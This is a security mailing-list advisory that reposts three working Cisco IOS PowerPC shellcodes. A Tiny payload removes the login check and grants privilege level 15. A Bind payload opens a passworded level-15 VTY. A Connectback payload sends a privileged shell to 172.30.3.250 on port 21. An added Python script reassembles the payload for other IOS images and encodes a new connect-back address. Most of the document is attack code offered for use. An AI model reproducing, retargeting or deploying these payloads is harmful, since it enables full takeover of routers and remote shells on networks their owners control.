[EXPL] Multiple Cisco IOS Shellcodes



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com



Multiple Cisco IOS Shellcodes
------------------------------------------------------------------------


SUMMARY

Several Cisco IOS shellcodes have been released by IRM Plc. They are payloads,
not vulnerabilities: an attacker who can already make a PowerPC-based Cisco
device execute arbitrary code (through some separate memory-corruption bug) can
use any of the shellcodes below to obtain a privilege-level-15 (enable) session,
in one case without a password and in another over a connect-back TCP session.
All three carry hard-coded addresses for one specific image, IOS C2600-IK9S-M
12.3(22), and must be re-targeted for any other IOS build.

DETAILS

Cisco IOS Tiny shellcode
# -----------------------------------------------
#
# Cisco IOS Tiny shellcode v1.0 - http://www.irmplc.com/downloads/presentations/IOS_tiny_v.1.0.txt
# (c) 2007 IRM Plc
# By Gyan Chawdhary
#
# -----------------------------------------------
#
# The code creates a new TTY, and sets the privilege level to 15 without a password
#
# This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device.
#
#
# The hard-coded addresses below (login, priv and the return address) must be located
# for the target IOS version.
#
# The hard-coded addresses used here are for:
#
# IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2)
#
# -----------------------------------------------
# Symbol definitions in GNU as (powerpc) syntax; the original listing wrote "equ".
.equ ret, 0x804a42e8      # address jumped to once the patches are in place
.equ login, 0x8359b1f4    # target of the login patch (zeroed)
.equ god, 0xff100000      # value stored into the priv slot (privilege level 15)
.equ priv, 0x8359be64     # target of the priv patch
# -----------------------------------------------

main:

# login patch begin
lis 9, login@ha
la 9, login@l(9)
li 8,0
stw 8, 0(9)
# login patch end

# priv patch begin
lis 9, priv@ha
la 9, priv@l(9)
lis 8, god@ha
la 8, god@l(8)
stw 8, 0(9)
# priv patch end

# exit code
lis 10, ret@ha
addi 4, 10, ret@l
mtctr 4
bctrl

Cisco IOS Bind shellcode
# -----------------------------------------------
#
# Cisco IOS Bind shellcode v1.0 - http://www.irmplc.com/downloads/presentations/IOS_Bindshell_v.1.0.txt
# (c) 2007 IRM Plc
# By Varun Uppal
#
# -----------------------------------------------
#
# The code creates a new VTY, allocates a password then sets the privilege level to 15
#
# This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device.
# Once assembled, the payload is only 116 bytes in length
#
# The following four hard-coded addresses must be located for the target IOS version.
# Version 1.1 of the shellcode will auto-locate these values and make the code
# IOS-version-independent
#
# The hard-coded addresses used here are for:
#
# IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2)
#
# -----------------------------------------------
# Symbol definitions in GNU as (powerpc) syntax; the original listing wrote "equ".
.equ makenewvty, 0x803d0d08
.equ malloc, 0x804785cc
.equ setpwonline, 0x803b9e90
.equ linesstruct, 0x82f9e334
# -----------------------------------------------

.equ priv, 0xf1000000 #value used to set the privilege level

main: li 3,71 #new vty line = 71
lis 9,makenewvty@ha
la 9,makenewvty@l(9)
mtctr 9
bctrl #makenewvty()

li 3,0x1e5c
lis 9,malloc@ha
la 9,malloc@l(9)
mtctr 9
bctrl #malloc() memory for structure

li 4,70
stw 4,0xa68(3)
li 5,72
stw 5,0xa6c(3)
li 4,0x00
bl setp #pointer to the password into LR

.string "1rmp455" #the password for the line; 7 chars + NUL = 8 bytes, so the next instruction stays 4-byte aligned

setp: mflr 5
lis 9,setpwonline@ha
la 9,setpwonline@l(9)
mtctr 9
bctrl #setpwonline()

lis 8,linesstruct@ha
la 8,linesstruct@l(8)
lwz 9,0(8)
lis 7,priv@ha
la 7,priv@l(7)
stw 7,0xde4(9) #set privilege level to 15

Cisco IOS Connectback shellcode
# -----------------------------------------------
#
# Cisco IOS Connectback shellcode v1.0 - http://www.irmplc.com/downloads/presentations/IOS_Connectback_v.1.0.txt
# (c) 2007 IRM Plc
# By Gyan Chawdhary
#
# -----------------------------------------------
#
# The code creates a new TTY, allocates a shell with privilege level 15 and connects back
# on port 21
#
# This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device.
#
#
# The hard-coded addresses below (and the 'god' privilege value) must be located for the
# target IOS version.
#
# The hard-coded addresses used here are for:
#
# IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2)
#
# -----------------------------------------------
# Symbol definitions in GNU as (powerpc) syntax; the original listing wrote "equ".
.equ malloc, 0x804785CC
.equ allocate_tty, 0x803d155c
.equ ret, 0x804a42e8
.equ addr, 0x803c4ad8
.equ str, 0x81e270b4
.equ tcp_connect, 0x80567568
.equ tcp_execute_command, 0x8056c354
.equ login, 0x8359b1f4
.equ god, 0xff100000
.equ priv, 0x8359be64
# -----------------------------------------------

main:
stwu 1,-48(1)
mflr 0
stw 31,44(1)
stw 0,52(1)
mr 31,1
li 3,512
lis 9,malloc@ha #malloc() memory for tcp structure
la 9,malloc@l(9)
mtctr 9
bctrl
mr 0,3
stw 0,20(31)
lwz 9,12(31)
li 0,1
stb 0,0(9)
lwz 9,12(31)
lis 0,0xac1e # connect-back IP address 172.30.3.250 = 0xac1e03fa: high half
ori 0,0,1018 # low half (1018 = 0x03fa); change both for the attacker's host
stw 0,4(9)
li 3,66
li 4,0
lis 9,allocate_tty@ha # allocate new TTY
la 9,allocate_tty@l(9)
mtctr 9
bctrl
addi 0,31,24

# Fix TTY structure to enable level 15 shell without password
#
#
##########################################################

# login patch begin
lis 9, login@ha
la 9, login@l(9)
li 8,0
stw 8, 0(9)
# login patch end

#IDA placeholder for con0
#
# lis %r9, ((stdio+0x10000)@h)
# lwz %r9, stdio@l(%r9)
# lwz %r0, 0xDE4(%r9) #priv struct
#
# priv patch begin
lis 9, priv@ha
la 9, priv@l(9)
lis 8, god@ha
la 8, god@l(8)
stw 8, 0(9)
# priv patch end

###########################################################

li 3,0
li 4,21 # Port 21 for connectback
lwz 5,12(31)
li 6,0
li 7,0
mr 8,0
li 9,0
lis 11,tcp_connect@ha # Connect to attacker IP
la 11,tcp_connect@l(11)
mtctr 11
bctrl
mr 0,3
stw 0,20(31)
li 3,66
lwz 4,20(31)
li 5,0
li 6,0
li 7,0
li 8,0
li 9,0
li 10,0
lis 11,tcp_execute_command@ha # Execute Virtual Terminal on outgoing connection, similar to /bin/bash
la 11,tcp_execute_command@l(11)
mtctr 11
bctrl
lwz 11,0(1)
lwz 0,4(11)
mtlr 0
lwz 31,-4(11)
mr 1,11

###########################################
lis 9, addr@ha
addi 0, 9, addr@l
mtctr 0
xor 3,3,3
addi 3,0, -2
lis 10, str@ha
addi 4, 10, str@l
bctrl
lis 10, ret@ha
addi 4, 10, ret@l
mtctr 4
bctrl
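The parts of all three listings that change when the payload is moved to another IOS image are the address-loading pairs (lis rD,sym@ha / la rD,sym@l(rD)) and, in the connect-back shellcode, the lis/ori pair that carries the attacker's IP. The Python below is an added example, not IRM's code: it computes the @ha/@l split (including the carry the assembler applies when the low half is negative), encodes the few PowerPC instruction forms the Tiny shellcode uses (32-bit, big-endian), reassembles that shellcode from a new symbol table, and lists the NUL bytes in the result, which matter when the payload has to survive a string-copy sink. The function names are the example's own; the four Tiny addresses and the 172.30.3.250 connect-back address are taken from the listings above.

```python
"""Added example: retarget the IRM 'Tiny' IOS shellcode for another image.

Not IRM's code. It encodes the few PowerPC instruction forms the listing
uses (big-endian, 32-bit), so the assembled bytes can be compared against
the output of a real assembler or regenerated for a new set of addresses.
"""
import struct

# IOS C2600-IK9S-M 12.3(22) addresses, copied from the Tiny listing.
TINY_12_3_22 = dict(ret=0x804A42E8, login=0x8359B1F4, god=0xFF100000, priv=0x8359BE64)


def split_ha_l(addr):
    """Return (addr@ha, addr@l) as the 16-bit fields lis/addi carry.

    addi sign-extends its immediate, so when bit 15 of the low half is set
    the high half must be one larger; adding 0x8000 before shifting does that.
    """
    addr &= 0xFFFFFFFF
    return ((addr + 0x8000) >> 16) & 0xFFFF, addr & 0xFFFF


def join_ha_l(ha, lo):
    """What the CPU computes for 'lis rD,ha ; addi rD,rD,lo'."""
    signed_lo = lo - 0x10000 if lo & 0x8000 else lo
    return ((ha << 16) + signed_lo) & 0xFFFFFFFF


def _imm16(v):
    if not -0x8000 <= v <= 0xFFFF:
        raise ValueError("immediate does not fit in 16 bits: %#x" % v)
    return v & 0xFFFF


# D-form encoders: opcode(6) | rD/rS(5) | rA(5) | 16-bit immediate or displacement
def addis(rd, ra, simm):
    return (15 << 26) | (rd << 21) | (ra << 16) | _imm16(simm)


def addi(rd, ra, simm):
    return (14 << 26) | (rd << 21) | (ra << 16) | _imm16(simm)


def ori(ra, rs, uimm):  # destination rA is written first, as in the listing
    return (24 << 26) | (rs << 21) | (ra << 16) | _imm16(uimm)


def stw(rs, disp, ra):
    return (36 << 26) | (rs << 21) | (ra << 16) | _imm16(disp)


def mtctr(rs):  # mtspr CTR(9),rS: XFX form, SPR number split into two 5-bit halves
    return (31 << 26) | (rs << 21) | (0x120 << 11) | (467 << 1)


BCTRL = 0x4E800421


def lis(rd, imm):
    return addis(rd, 0, imm)


def li(rd, imm):
    return addi(rd, 0, imm)


def load_addr(rd, addr, rt=None):
    """'lis rD,addr@ha ; addi rT,rD,addr@l' (rT defaults to rD, i.e. 'la')."""
    ha, lo = split_ha_l(addr)
    return [lis(rd, ha), addi(rd if rt is None else rt, rd, lo)]


def assemble_tiny(ret, login, god, priv):
    """Encode the Tiny shellcode body (13 instructions) for the given symbols."""
    words = []
    words += load_addr(9, login) + [li(8, 0), stw(8, 0, 9)]           # *login = 0
    words += load_addr(9, priv) + load_addr(8, god) + [stw(8, 0, 9)]   # *priv = god
    words += load_addr(10, ret, rt=4) + [mtctr(4), BCTRL]             # jump to ret
    return b"".join(struct.pack(">I", w) for w in words)


def ipv4_to_lis_ori(ip, rd=0):
    """Encode 'lis rD,hi ; ori rD,rD,lo' for a dotted-quad connect-back address."""
    a, b, c, d = (int(x) for x in ip.split("."))
    hi, lo = (a << 8) | b, (c << 8) | d
    return [lis(rd, hi), ori(rd, rd, lo)]


def nul_byte_offsets(code):
    """Offsets of 0x00 bytes: a strcpy-style sink truncates the payload at the first."""
    return [i for i, b in enumerate(code) if b == 0]


if __name__ == "__main__":
    code = assemble_tiny(**TINY_12_3_22)
    print(len(code), "bytes:", code.hex())
    print("NUL bytes at", nul_byte_offsets(code))
    print("connect-back words:", [hex(w) for w in ipv4_to_lis_ori("172.30.3.250")])
```

Two points the output makes visible: the Tiny payload is 52 bytes but contains ten NUL bytes (from li 8,0, the stw displacements and the god@l half), so it only works through a sink that copies a known length, and for 0x8359b1f4 the @ha half is 0x835a rather than 0x8359, which is the carry a hand-patched payload most often gets wrong.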


ADDITIONAL INFORMATION

The information has been provided by <mailto:gyan.chawdhary@xxxxxxxxxx>
Gyan Chawdhary.


